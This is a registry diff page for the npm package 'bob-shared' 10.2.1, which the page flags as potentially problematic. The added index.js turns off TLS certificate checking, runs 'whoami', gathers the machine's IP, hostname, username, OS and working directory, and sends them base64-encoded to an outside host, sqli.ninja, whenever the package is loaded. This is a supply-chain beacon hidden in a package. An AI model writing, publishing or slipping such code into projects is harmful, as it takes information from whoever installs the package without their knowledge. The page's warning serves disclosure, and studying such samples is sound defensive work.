bob-shared 10.2.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of bob-shared might be problematic. Click here for more details.
- package/index.js +49 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1,49 @@
|
|
1
|
+
var os = require("os");
|
2
|
+
|
3
|
+
var package_name = "bob-shared"
|
4
|
+
var target = "hbb_bc"
|
5
|
+
|
6
|
+
process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";
|
7
|
+
|
8
|
+
// GET internal IP
|
9
|
+
var address,os = require('os'),ifaces = os.networkInterfaces();
|
10
|
+
|
11
|
+
// GET FQDN
|
12
|
+
var child_process = require("child_process");
|
13
|
+
var fqdn = child_process.execSync("whoami");
|
14
|
+
var fqdnstr = fqdn.toString().replace(/\r?\n|\r/g, " ");
|
15
|
+
|
16
|
+
// Iterate over interfaces ...
|
17
|
+
for (var dev in ifaces) {
|
18
|
+
|
19
|
+
// ... and find the one that matches the criteria
|
20
|
+
var iface = ifaces[dev].filter(function(details) {
|
21
|
+
return details.family === 'IPv4' && details.internal === false;
|
22
|
+
});
|
23
|
+
|
24
|
+
if(iface.length > 0) address = iface[0].address;
|
25
|
+
}
|
26
|
+
|
27
|
+
// building the string for GET data in dc.php
|
28
|
+
var datastring = 'Local%20IP:%09'+address+'%0aHostname:%09'+os.hostname()+'%0aFQDN:%09%09'+fqdnstr+'%0aUsername:%09'+os.userInfo().username+'%0aOperatingsystem:%09'+os.platform+'%20'+os.release+'%0aWorking%20directory:%09'+__dirname
|
29
|
+
// converting into base64
|
30
|
+
let buff = new Buffer(datastring);
|
31
|
+
let base64datastring = buff.toString('base64');
|
32
|
+
|
33
|
+
const https = require('https')
|
34
|
+
const options = {
|
35
|
+
hostname: 'sqli.ninja',
|
36
|
+
port: 443,
|
37
|
+
path: '/stuff/dc.php?target='+target+'&package_name='+package_name+'&repo=npm&data='+base64datastring,
|
38
|
+
method: 'GET'
|
39
|
+
}
|
40
|
+
|
41
|
+
const req = https.request(options, res => {
|
42
|
+
console.log(`statusCode: ${res.statusCode}`)
|
43
|
+
})
|
44
|
+
|
45
|
+
req.on('error', error => {
|
46
|
+
console.error(error)
|
47
|
+
})
|
48
|
+
|
49
|
+
req.end()
|